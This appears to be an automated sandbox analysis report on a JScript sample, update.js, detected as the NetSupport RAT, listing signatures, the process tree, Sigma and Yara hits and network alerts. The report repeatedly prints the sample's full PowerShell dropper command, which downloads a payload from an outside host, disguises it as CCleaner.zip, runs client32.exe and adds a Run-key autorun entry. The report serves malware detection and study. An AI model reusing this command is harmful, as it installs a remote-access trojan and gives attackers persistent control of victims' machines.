

Windows Analysis Report
update.js

Overview

General Information

Sample name: update.js
Analysis ID: 1490239
MD5: 0d49cb3d2e8bfb9fce01adc2485da2b5
SHA1: ce08e5084103407eebec38525dbe36a8403b5465
SHA256: d43dbee4487ce35554643d0ceb620f179351a149f74373251e8efd1676604f6f

Detection

NetSupport RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
System process connects to network (likely due to code injection or exploit)
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Enables security privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64_ra
  • wscript.exe (PID: 4992 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 6308 cmdline: "C:\Users\user\AppData\Roaming\RYMB15\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • svchost.exe (PID: 6260 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 1448 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
Yara matches on dropped files (5 of 9 shown). Columns: Source | Rule | Description | Author
  C:\Users\user\AppData\Roaming\RYMB15\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Yara matches in process memory dumps (5 of 7 shown). Columns: Source | Rule | Description | Author
  0000000D.00000000.1483378561.0000000000082000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  0000000B.00000002.1544728438.00000177485B4000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  0000000B.00000002.1544728438.000001774858B000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  0000000B.00000002.1544728438.00000177486DB000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
  0000000B.00000002.1544728438.00000177485AA000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security

System Summary

                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; 
$fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 149.255.36.73, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4992, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49701
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else 
{Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 4992, ProcessName: wscript.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\RYMB15\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BCYLGMFSMV
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetFilename: C:\Users\user\AppData\Roaming\RYMB15\client32.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No 
exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 149.255.36.73, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 4992, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49701
                      Source: Event LogsAuthor: Florian Roth (Nextron Systems): Data: ContextInfo: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 844c58f6-60f8-4825-b253-e962a0e4a534 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 2fed494c-97fa-4e56-aaca-f57af518af1b Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 844c58f6-60f8-4825-b253-e962a0e4a534 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C 
$AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -Prope
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process 
-FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 4992, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No 
exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6260, ProcessName: svchost.exe

                      Remote Access Functionality

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetFilename: C:\Users\user\AppData\Roaming\RYMB15\NSM.LIC
                      Timestamp                         SID      Severity  Source Port  Destination Port  Protocol  Classtype
                      2024-08-08T22:34:39.975150+0200   2054858  1         54365        53                UDP       Exploit Kit Activity Detected
                      2024-08-08T22:34:21.469423+0200   2055002  1         49701        443               TCP       Exploit Kit Activity Detected
